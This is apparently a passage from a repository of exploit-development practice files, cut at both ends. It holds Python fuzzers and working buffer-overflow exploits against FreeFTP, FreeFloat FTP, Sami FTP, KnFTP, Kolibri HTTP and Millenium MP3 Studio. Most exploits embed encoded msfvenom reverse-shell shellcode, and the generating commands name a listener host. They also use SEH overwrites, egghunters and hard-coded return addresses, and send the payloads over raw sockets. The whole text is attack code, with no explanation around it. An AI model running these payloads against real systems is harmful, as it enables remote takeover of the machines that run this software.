x72\x78\xa3\xc3\x82\xf7\xd8\x5b\xd5\x50\x2e\x92\xb3\x4c\x09\x0c\xa1\x8c\xcf\x77\x61\x4b\x2c\x79\x68\x1e\x08\x5d\x7a\xe6\x91\xd9\x2e\xb6\xc7\xb7\x98\x70\xbe\x79\x72\x2b\x6d\xd0\x12\xaa\x5d\xe3\x64\xb3\x8b\x95\x88\x02\x62\xe0\xb7\xab\xe2\xe4\xc0\xd1\x92\x0b\x1b\x52\xa2\x41\x01\xf3\x2b\x0c\xd0\x41\x36\xaf\x0f\x85\x4f\x2c\xa5\x76\xb4\x2c\xcc\x73\xf0\xea\x3d\x0e\x69\x9f\x41\xbd\x8a\x8a") 8 | 9 | egg = "USER "+"kalikali"+shell +"\r\n"; 10 | 11 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 12 | 13 | offset = "A" * (801-4-len(egghunter)) + egghunter 14 | nseh = "\x90\x90\xeb\x80" #jmp 128 byte 15 | seh = "\x26\x42\x41\x00" #00414226 pop pop ret 16 | 17 | buffer = offset + nseh + seh 18 | 19 | 20 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 21 | s.connect((host,port)) 22 | s2 = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 23 | s2.connect((host,port)) 24 | s2.recv(1024) 25 | s2.send(egg) 26 | s.recv(1024) 27 | s.send("USER anonymous\r\n") 28 | s.recv(1024) 29 | s.send("PASS "+buffer+"\r\n") 30 | s.close() 31 | -------------------------------------------------------------------------------- /FreeFTP 1.0.8/fuzz.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | def main(): 4 | ip = '192.168.1.9' 5 | port = 21 6 | username = 'anonymous' 7 | password = 'ftp' 8 | 9 | buffer = ["A"] 10 | counter = 20 11 | commands = ["PASS"] 12 | 13 | while len(buffer) <= 30: 14 | buffer.append("A" * counter) 15 | counter = counter + 100 16 | 17 | for command in commands: 18 | for string in buffer: 19 | print "Fuzzing " + command + " with lenght: " + str(len(string)) 20 | 21 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | connect = sock.connect((ip, port)) 23 | sock.recv(1024) 24 | if command == 'PASS': 25 | sock.send('USER ' + username + '\r\n') 26 | sock.recv(1024) 27 | elif command is not 'USER' and command is not 'PASS': 28 | sock.send('USER ' + username + '\r\n') 29 | sock.recv(1024) 30 | sock.send('PASS ' + password + '\r\n') 31 | sock.recv(1024) 32 | sock.send(command + ' ' + string + '\r\n') 33 | sock.recv(1024) 34 | sock.send('QUIT\r\n') 35 | sock.close() 36 | 37 | if __name__ == '__main__': 38 | main() 39 | -------------------------------------------------------------------------------- /FreeFloat/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | # eip 77E9F8F7 kernel32 dll 6 | # bad \x00\x0A\x0D 7 | 8 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.9 LPORT=9696 -f python -b \x00\x0A\x0D --platform windows -a x86 -e x86/shikata_ga_nai EXITFUNC=thread 9 | 10 | 11 | buf = "" 12 | buf += "\xda\xd4\xd9\x74\x24\xf4\xbf\x2c\xc2\x29\xf1\x5d\x29" 13 | buf += "\xc9\xb1\x52\x31\x7d\x17\x83\xc5\x04\x03\x51\xd1\xcb" 14 | buf += "\x04\x55\x3d\x89\xe7\xa5\xbe\xee\x6e\x40\x8f\x2e\x14" 15 | buf += "\x01\xa0\x9e\x5e\x47\x4d\x54\x32\x73\xc6\x18\x9b\x74" 16 | buf += "\x6f\x96\xfd\xbb\x70\x8b\x3e\xda\xf2\xd6\x12\x3c\xca" 17 | buf += "\x18\x67\x3d\x0b\x44\x8a\x6f\xc4\x02\x39\x9f\x61\x5e" 18 | buf += "\x82\x14\x39\x4e\x82\xc9\x8a\x71\xa3\x5c\x80\x2b\x63" 19 | buf += "\x5f\x45\x40\x2a\x47\x8a\x6d\xe4\xfc\x78\x19\xf7\xd4" 20 | buf += "\xb0\xe2\x54\x19\x7d\x11\xa4\x5e\xba\xca\xd3\x96\xb8" 21 | buf += "\x77\xe4\x6d\xc2\xa3\x61\x75\x64\x27\xd1\x51\x94\xe4" 22 | buf += "\x84\x12\x9a\x41\xc2\x7c\xbf\x54\x07\xf7\xbb\xdd\xa6" 23 | buf += "\xd7\x4d\xa5\x8c\xf3\x16\x7d\xac\xa2\xf2\xd0\xd1\xb4" 24 | buf += "\x5c\x8c\x77\xbf\x71\xd9\x05\xe2\x1d\x2e\x24\x1c\xde" 25 | buf += "\x38\x3f\x6f\xec\xe7\xeb\xe7\x5c\x6f\x32\xf0\xa3\x5a" 26 | buf += "\x82\x6e\x5a\x65\xf3\xa7\x99\x31\xa3\xdf\x08\x3a\x28" 27 | buf += "\x1f\xb4\xef\xff\x4f\x1a\x40\x40\x3f\xda\x30\x28\x55" 28 | buf += "\xd5\x6f\x48\x56\x3f\x18\xe3\xad\xa8\xe7\x5c\xac\x21" 29 | buf += "\x80\x9e\xae\x14\xb0\x16\x48\x3c\x20\x7f\xc3\xa9\xd9" 30 | buf += "\xda\x9f\x48\x25\xf1\xda\x4b\xad\xf6\x1b\x05\x46\x72" 31 | buf += "\x0f\xf2\xa6\xc9\x6d\x55\xb8\xe7\x19\x39\x2b\x6c\xd9" 32 | buf += "\x34\x50\x3b\x8e\x11\xa6\x32\x5a\x8c\x91\xec\x78\x4d" 33 | buf += "\x47\xd6\x38\x8a\xb4\xd9\xc1\x5f\x80\xfd\xd1\x99\x09" 34 | buf += "\xba\x85\x75\x5c\x14\x73\x30\x36\xd6\x2d\xea\xe5\xb0" 35 | buf += "\xb9\x6b\xc6\x02\xbf\x73\x03\xf5\x5f\xc5\xfa\x40\x60" 36 | buf += "\xea\x6a\x45\x19\x16\x0b\xaa\xf0\x92\x2b\x49\xd0\xee" 37 | buf += "\xc3\xd4\xb1\x52\x8e\xe6\x6c\x90\xb7\x64\x84\x69\x4c" 38 | buf += "\x74\xed\x6c\x08\x32\x1e\x1d\x01\xd7\x20\xb2\x22\xf2" 39 | 40 | 41 | buffer = "A"*247 42 | buffer += "\xF7\xF8\xE9\x77" 43 | buffer += "\x90" * 30 44 | buffer += buf 45 | 46 | s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | connect=s.connect(('192.168.1.10',21)) 48 | 49 | s.recv(1024) 50 | s.send('USER kalisa\r\n') 51 | s.recv(1024) 52 | s.send('PASS kalisa\r\n') 53 | s.recv(1024) 54 | s.send('MKD '+buffer+'\r\n') 55 | s.recv(1024) 56 | s.send('QUIT\r\n') 57 | s.close() 58 | -------------------------------------------------------------------------------- /KarjaSoft Sami FTP Server 2.0.1/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from boofuzz import * 3 | from boofuzz import pedrpc 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("user") 12 | s_static("USER") 13 | s_delim(" ") 14 | s_static("anonymous") 15 | s_static("\r\n") 16 | 17 | s_initialize("pass") 18 | s_static("PASS") 19 | s_delim(" ") 20 | s_string("FUZZ") 21 | s_static("\r\n") 22 | 23 | session.connect(s_get("user")) 24 | session.connect(s_get("user"), s_get("pass")) 25 | 26 | session.fuzz() 27 | if __name__ == "__main__": 28 | main() 29 | -------------------------------------------------------------------------------- /KarjaSoft Sami FTP Server 2.0.1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f c -b '\x00\x0a\x0d' --platform windows -a x86 -v shellcode -e x86/alpha_mixed EXITFUNC=thread 9 | shellcode = ("\x89\xe5\xd9\xd0\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" 10 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" 11 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" 12 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 13 | "\x79\x6c\x6d\x38\x4d\x52\x63\x30\x37\x70\x53\x30\x71\x70\x6b" 14 | "\x39\x48\x65\x35\x61\x6f\x30\x75\x34\x6e\x6b\x72\x70\x34\x70" 15 | "\x4e\x6b\x53\x62\x74\x4c\x4c\x4b\x50\x52\x55\x44\x6c\x4b\x72" 16 | "\x52\x35\x78\x36\x6f\x6c\x77\x50\x4a\x61\x36\x65\x61\x69\x6f" 17 | "\x6c\x6c\x65\x6c\x51\x71\x53\x4c\x65\x52\x34\x6c\x35\x70\x4a" 18 | "\x61\x58\x4f\x44\x4d\x77\x71\x5a\x67\x4a\x42\x49\x62\x52\x72" 19 | "\x36\x37\x6c\x4b\x72\x72\x34\x50\x6c\x4b\x42\x6a\x77\x4c\x4e" 20 | "\x6b\x62\x6c\x74\x51\x34\x38\x78\x63\x63\x78\x55\x51\x6b\x61" 21 | "\x30\x51\x4c\x4b\x56\x39\x77\x50\x73\x31\x59\x43\x4c\x4b\x52" 22 | "\x69\x52\x38\x59\x73\x34\x7a\x62\x69\x4c\x4b\x77\x44\x4e\x6b" 23 | "\x45\x51\x4e\x36\x36\x51\x69\x6f\x4e\x4c\x7a\x61\x58\x4f\x66" 24 | "\x6d\x77\x71\x4b\x77\x64\x78\x59\x70\x50\x75\x59\x66\x76\x63" 25 | "\x53\x4d\x59\x68\x47\x4b\x73\x4d\x44\x64\x31\x65\x6b\x54\x63" 26 | "\x68\x6e\x6b\x46\x38\x67\x54\x53\x31\x6e\x33\x45\x36\x4e\x6b" 27 | "\x54\x4c\x72\x6b\x4e\x6b\x33\x68\x75\x4c\x67\x71\x59\x43\x4e" 28 | "\x6b\x75\x54\x4e\x6b\x65\x51\x68\x50\x6f\x79\x73\x74\x46\x44" 29 | "\x54\x64\x71\x4b\x53\x6b\x50\x61\x63\x69\x32\x7a\x43\x61\x4b" 30 | "\x4f\x4d\x30\x51\x4f\x63\x6f\x52\x7a\x6c\x4b\x55\x42\x38\x6b" 31 | "\x4e\x6d\x31\x4d\x55\x38\x57\x43\x67\x42\x37\x70\x43\x30\x70" 32 | "\x68\x52\x57\x72\x53\x66\x52\x73\x6f\x50\x54\x50\x68\x50\x4c" 33 | "\x62\x57\x65\x76\x33\x37\x49\x6f\x39\x45\x4c\x78\x6c\x50\x35" 34 | "\x51\x45\x50\x75\x50\x74\x69\x4f\x34\x72\x74\x70\x50\x43\x58" 35 | "\x74\x69\x4f\x70\x52\x4b\x65\x50\x69\x6f\x48\x55\x30\x50\x30" 36 | "\x50\x42\x70\x76\x30\x47\x30\x72\x70\x61\x50\x30\x50\x53\x58" 37 | "\x39\x7a\x56\x6f\x4b\x6f\x59\x70\x69\x6f\x6e\x35\x4f\x67\x30" 38 | "\x6a\x45\x55\x50\x68\x69\x50\x59\x38\x37\x71\x66\x68\x32\x48" 39 | "\x57\x72\x67\x70\x55\x4a\x66\x6a\x6b\x39\x6a\x46\x63\x5a\x32" 40 | "\x30\x56\x36\x53\x67\x65\x38\x6f\x69\x6d\x75\x43\x44\x50\x61" 41 | "\x4b\x4f\x6b\x65\x4c\x45\x6f\x30\x51\x64\x44\x4c\x49\x6f\x70" 42 | "\x4e\x47\x78\x32\x55\x4a\x4c\x62\x48\x7a\x50\x4e\x55\x4c\x62" 43 | "\x46\x36\x4b\x4f\x78\x55\x53\x58\x71\x73\x50\x6d\x75\x34\x47" 44 | "\x70\x4f\x79\x6a\x43\x71\x47\x42\x77\x42\x77\x64\x71\x48\x76" 45 | "\x30\x6a\x32\x32\x56\x39\x50\x56\x49\x72\x49\x6d\x35\x36\x7a" 46 | "\x67\x70\x44\x57\x54\x35\x6c\x45\x51\x45\x51\x6e\x6d\x61\x54" 47 | "\x74\x64\x46\x70\x69\x56\x55\x50\x50\x44\x63\x64\x32\x70\x31" 48 | "\x46\x62\x76\x53\x66\x63\x76\x61\x46\x62\x6e\x72\x76\x33\x66" 49 | "\x53\x63\x30\x56\x52\x48\x30\x79\x78\x4c\x47\x4f\x4f\x76\x4b" 50 | "\x4f\x4b\x65\x4b\x39\x6d\x30\x62\x6e\x36\x36\x42\x66\x6b\x4f" 51 | "\x50\x30\x30\x68\x37\x78\x6d\x57\x47\x6d\x33\x50\x69\x6f\x68" 52 | "\x55\x6f\x4b\x6b\x50\x75\x4d\x75\x7a\x74\x4a\x43\x58\x39\x36" 53 | "\x4f\x65\x6f\x4d\x6f\x6d\x69\x6f\x4b\x65\x55\x6c\x76\x66\x61" 54 | "\x6c\x66\x6a\x6f\x70\x69\x6b\x49\x70\x43\x45\x54\x45\x6d\x6b" 55 | "\x42\x67\x52\x33\x43\x42\x52\x4f\x63\x5a\x63\x30\x50\x53\x69" 56 | "\x6f\x38\x55\x41\x41") 57 | 58 | 59 | 60 | offset = "A"*(600-4) 61 | #nseh = "B"*4 62 | nseh = '\x40\x40\x75\x04' # short jmp 63 | seh = "\x69\x9c\x01\x10" # tmp0.dll pop pop ret 0x10019c69 64 | junk = "D"*30 65 | 66 | buffer = offset + nseh + seh + "\x90"*10 + shellcode 67 | 68 | s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) 69 | connect=s.connect((host,port)) 70 | 71 | s.send('USER ' + buffer + '\r\n') 72 | s.recv(1024) 73 | s.send('PASS ' + buffer + '\r\n') 74 | s.recv(1024) 75 | s.close() 76 | -------------------------------------------------------------------------------- /KnFTP Server 1.0.0/exploit.py: -------------------------------------------------------------------------------- 1 | import sys,socket 2 | 3 | host = '192.168.1.9' 4 | port = 21 5 | 6 | jmp_esp = "\x53\x93\x42\x7E" #user32.dll 7e429353 7 | 8 | egg = "w00tw00t" 9 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 10 | 11 | padding = "\x90" * 15 12 | 13 | # shellcode 227 bytes 14 | shellcode = "" 15 | shellcode += "\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" 16 | shellcode += "\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8" 17 | shellcode += "\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19" 18 | shellcode += "\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49" 19 | shellcode += "\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1" 20 | shellcode += "\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d" 21 | shellcode += "\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36" 22 | shellcode += "\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7" 23 | shellcode += "\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf" 24 | shellcode += "\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e" 25 | shellcode += "\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca" 26 | shellcode += "\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7" 27 | shellcode += "\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45" 28 | shellcode += "\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a" 29 | shellcode += "\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18" 30 | shellcode += "\x9c\x61" 31 | 32 | offset = "A"*(284-8-len(shellcode)) 33 | payload = offset + egg + shellcode + jmp_esp + padding + egghunter 34 | 35 | buff = "USER " + payload + "\r\n\r\n" 36 | 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.connect((host,port)) 39 | s.send(buff) 40 | s.recv(1024) 41 | s.close() 42 | -------------------------------------------------------------------------------- /Kolibri v2.0 HTTP Server/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os,sys,socket 4 | # JMP ESP 0x7e429353 5 | 6 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 7 | 8 | # offset: 515 9 | stage1 = "A"*(515-32-7) + egghunter + "A" * 7 + "\x53\x93\x42\x7e" + "\xeb\xce" 10 | 11 | shellcode = "" 12 | shellcode += "\x89\xe3\xdb\xc1\xd9\x73\xf4\x5e\x56\x59\x49\x49" 13 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" 14 | shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" 15 | shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" 16 | shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 17 | shellcode += "\x69\x6c\x4d\x38\x4d\x52\x55\x50\x35\x50\x45\x50" 18 | shellcode += "\x43\x50\x4d\x59\x69\x75\x34\x71\x4f\x30\x55\x34" 19 | shellcode += "\x6e\x6b\x76\x30\x34\x70\x4e\x6b\x61\x42\x74\x4c" 20 | shellcode += "\x4c\x4b\x62\x72\x46\x74\x4c\x4b\x32\x52\x55\x78" 21 | shellcode += "\x46\x6f\x38\x37\x32\x6a\x57\x56\x34\x71\x6b\x4f" 22 | shellcode += "\x6e\x4c\x37\x4c\x30\x61\x31\x6c\x76\x62\x54\x6c" 23 | shellcode += "\x35\x70\x49\x51\x4a\x6f\x44\x4d\x47\x71\x4a\x67" 24 | shellcode += "\x49\x72\x7a\x52\x31\x42\x72\x77\x6e\x6b\x63\x62" 25 | shellcode += "\x52\x30\x6e\x6b\x63\x7a\x35\x6c\x4e\x6b\x32\x6c" 26 | shellcode += "\x52\x31\x64\x38\x78\x63\x61\x58\x46\x61\x6b\x61" 27 | shellcode += "\x70\x51\x4c\x4b\x33\x69\x47\x50\x63\x31\x58\x53" 28 | shellcode += "\x6c\x4b\x50\x49\x42\x38\x49\x73\x45\x6a\x32\x69" 29 | shellcode += "\x4e\x6b\x47\x44\x4e\x6b\x36\x61\x6b\x66\x75\x61" 30 | shellcode += "\x79\x6f\x4e\x4c\x6f\x31\x6a\x6f\x74\x4d\x57\x71" 31 | shellcode += "\x79\x57\x50\x38\x69\x70\x74\x35\x6b\x46\x36\x63" 32 | shellcode += "\x53\x4d\x6a\x58\x65\x6b\x63\x4d\x34\x64\x51\x65" 33 | shellcode += "\x4b\x54\x52\x78\x4e\x6b\x46\x38\x46\x44\x65\x51" 34 | shellcode += "\x39\x43\x62\x46\x6e\x6b\x34\x4c\x42\x6b\x6e\x6b" 35 | shellcode += "\x63\x68\x37\x6c\x43\x31\x78\x53\x6c\x4b\x66\x64" 36 | shellcode += "\x6e\x6b\x36\x61\x4e\x30\x4c\x49\x37\x34\x67\x54" 37 | shellcode += "\x55\x74\x53\x6b\x71\x4b\x50\x61\x56\x39\x42\x7a" 38 | shellcode += "\x73\x61\x59\x6f\x59\x70\x53\x6f\x51\x4f\x30\x5a" 39 | shellcode += "\x4e\x6b\x65\x42\x6a\x4b\x4c\x4d\x73\x6d\x53\x58" 40 | shellcode += "\x47\x43\x65\x62\x63\x30\x47\x70\x65\x38\x34\x37" 41 | shellcode += "\x73\x43\x64\x72\x53\x6f\x31\x44\x33\x58\x50\x4c" 42 | shellcode += "\x71\x67\x77\x56\x55\x57\x69\x6f\x5a\x75\x6f\x48" 43 | shellcode += "\x6c\x50\x33\x31\x73\x30\x77\x70\x71\x39\x6f\x34" 44 | shellcode += "\x71\x44\x46\x30\x65\x38\x77\x59\x4b\x30\x50\x6b" 45 | shellcode += "\x57\x70\x59\x6f\x78\x55\x30\x50\x56\x30\x32\x70" 46 | shellcode += "\x32\x70\x63\x70\x62\x70\x61\x50\x50\x50\x52\x48" 47 | shellcode += "\x4b\x5a\x46\x6f\x59\x4f\x59\x70\x69\x6f\x68\x55" 48 | shellcode += "\x6f\x67\x30\x6a\x56\x65\x63\x58\x69\x50\x39\x38" 49 | shellcode += "\x57\x71\x63\x34\x73\x58\x44\x42\x45\x50\x46\x7a" 50 | shellcode += "\x57\x7a\x6f\x79\x49\x76\x61\x7a\x36\x70\x36\x36" 51 | shellcode += "\x66\x37\x75\x38\x4c\x59\x4c\x65\x61\x64\x53\x51" 52 | shellcode += "\x4b\x4f\x4e\x35\x6e\x65\x59\x50\x54\x34\x34\x4c" 53 | shellcode += "\x6b\x4f\x32\x6e\x37\x78\x61\x65\x68\x6c\x31\x78" 54 | shellcode += "\x5a\x50\x38\x35\x4e\x42\x36\x36\x79\x6f\x78\x55" 55 | shellcode += "\x53\x58\x43\x53\x50\x6d\x51\x74\x65\x50\x6f\x79" 56 | shellcode += "\x48\x63\x51\x47\x31\x47\x36\x37\x54\x71\x58\x76" 57 | shellcode += "\x63\x5a\x56\x72\x46\x39\x52\x76\x58\x62\x69\x6d" 58 | shellcode += "\x43\x56\x4a\x67\x77\x34\x56\x44\x47\x4c\x56\x61" 59 | shellcode += "\x75\x51\x6e\x6d\x72\x64\x55\x74\x72\x30\x79\x56" 60 | shellcode += "\x53\x30\x63\x74\x36\x34\x50\x50\x52\x76\x53\x66" 61 | shellcode += "\x56\x36\x51\x56\x73\x66\x32\x6e\x42\x76\x70\x56" 62 | shellcode += "\x31\x43\x71\x46\x42\x48\x70\x79\x5a\x6c\x67\x4f" 63 | shellcode += "\x4e\x66\x49\x6f\x6a\x75\x4f\x79\x49\x70\x50\x4e" 64 | shellcode += "\x66\x36\x31\x56\x59\x6f\x66\x50\x43\x58\x63\x38" 65 | shellcode += "\x6f\x77\x57\x6d\x75\x30\x79\x6f\x4e\x35\x4f\x4b" 66 | shellcode += "\x68\x70\x6f\x45\x4c\x62\x33\x66\x53\x58\x4f\x56" 67 | shellcode += "\x4e\x75\x6d\x6d\x4f\x6d\x4b\x4f\x69\x45\x37\x4c" 68 | shellcode += "\x66\x66\x61\x6c\x55\x5a\x6b\x30\x6b\x4b\x59\x70" 69 | shellcode += "\x53\x45\x77\x75\x4d\x6b\x70\x47\x64\x53\x74\x32" 70 | shellcode += "\x50\x6f\x43\x5a\x77\x70\x43\x63\x59\x6f\x4e\x35" 71 | shellcode += "\x41\x41" 72 | 73 | 74 | stage2 = "kalikali" + shellcode # 6b616c69 75 | 76 | buffer = ( 77 | "HEAD /" + stage1 + " HTTP/1.1\r\n" 78 | "Host: 192.168.1.3:8080\r\n" 79 | "User-Agent: " + stage2 + "\r\n" 80 | "Keep-Alive: 115\r\n" 81 | "Connection: keep-alive\r\n\r\n") 82 | 83 | ip = "192.168.1.3" 84 | port = 8080 85 | 86 | print "[*] Trying to connect" 87 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 88 | s.connect((ip,port)) 89 | s.send(buffer) 90 | print "[*] Payload sent" 91 | s.close() 92 | -------------------------------------------------------------------------------- /Kolibri v2.0 HTTP Server/fuzz: -------------------------------------------------------------------------------- 1 | GET /favicon.ico HTTP/1.1 2 | Host: 192.168.1.10:8081 3 | Connection: keep-alive 4 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 5 | Accept: */* 6 | Referer: http://localhost:8081/ 7 | Accept-Encoding: gzip, deflate, sdch 8 | Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 9 | 10 | python boo-gen.py kolibri.txt --get 11 | 12 | python request.py 13 | -------------------------------------------------------------------------------- /Millenium MP3 Studio/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = "kalisa.mpf" 4 | 5 | buffer = "http://" + "A" * 5000 6 | 7 | f = open(file,'w') 8 | f.write(buffer) 9 | f.close() 10 | -------------------------------------------------------------------------------- /Millenium MP3 Studio/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = "kalisa.mpf" 4 | 5 | #buffer = "A"*4112+"B"*4+"C"*4 6 | 7 | # nseh (4) + seh (4) +other (8) = 16 8 | # other (8) + hole (4) + other (4) = 16 9 | # start of shellcode = 16 bytes 10 | 11 | # 2 null bytes from nseh (2) + 4 seh (4) + other (8) + 16 next row (16) = 30 bytes 12 | 13 | # \xeb\x1e means jmp 30 bytes which will be in nseh for 2 bytes 14 | 15 | offset = "http://" + "A" * 4105 16 | nextSEH = "\xeb\x1e\x90\x90" # jmp 30 bytes 17 | SEH = "\xAE\x03\x01\x10" # pop-pop-ret from xaudio.dll 18 | nops = "\x90" * 24 # 24 bytes nop sled 19 | 20 | # msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl 21 | # [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) 22 | 23 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 24 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 25 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 26 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 27 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 28 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 29 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 30 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 31 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 32 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 33 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 34 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 35 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 36 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 37 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 38 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 39 | "\x63\x03\x6b") 40 | 41 | #shellcode = "\xcc\xcc\xcc\xcc" 42 | 43 | buffer = offset + nextSEH + SEH + nops + calc 44 | 45 | f = open(file,'w') 46 | f.write(buffer) 47 | f.close() 48 | -------------------------------------------------------------------------------- /Minialic HTTP/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Designed for use with boofuzz v0.0.9 3 | from boofuzz import * 4 | 5 | 6 | def main(): 7 | session = Session( 8 | target=Target( 9 | connection=SocketConnection("192.168.1.10", 8080, proto='tcp') 10 | ), 11 | ) 12 | 13 | s_initialize(name="Request") 14 | with s_block("Request-Line"): 15 | s_group("Method", ["GET"]) 16 | s_delim(" ", name='space-1',fuzzable=False) 17 | s_string("/", name='Request-URI', fuzzable = False) 18 | s_delim(" ", name='space-2',fuzzable=False) 19 | s_string(" ", fuzzable=False) 20 | s_string("HTTP/1.1", name='HTTP-Version', fuzzable = False) 21 | s_delim("\r\n", name='return-1', fuzzable = False) 22 | s_string("Host:", name="Host", fuzzable = False) 23 | s_delim(" ", name="space-3", fuzzable = False) 24 | s_string("192.168.1.10:8080", name="Host-Value") 25 | s_delim("\r\n", name="return-2", fuzzable = False) 26 | s_string("Connection:", name="Connection", fuzzable = False) 27 | s_delim(" ", name="space-4", fuzzable = False) 28 | s_string("keep-alive", name="Connection-Value", fuzzable = False) 29 | s_delim("\r\n", name="return-3", fuzzable = False) 30 | s_string("Cache-Control:", name="Cache-Control", fuzzable = False) 31 | s_delim(" ", name="space-5", fuzzable = False) 32 | s_string("max-age=0", name="Cache-Control-Value", fuzzable = False) 33 | s_delim("\r\n", name="return-4", fuzzable = False) 34 | s_string("Accept:", name="Accept", fuzzable = False) 35 | s_delim(" ", name="space-6", fuzzable = False) 36 | s_string("text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", name="Accept-Value", fuzzable = False) 37 | s_delim("\r\n", name="return-5", fuzzable = False) 38 | s_string("Upgrade-Insecure-Requests:", name="Upgrade-Insecure-Requests", fuzzable = False) 39 | s_delim(" ", name="space-7", fuzzable = False) 40 | s_string("1", name="Upgrade-Insecure-Requests-Value", fuzzable = False) 41 | s_delim("\r\n", 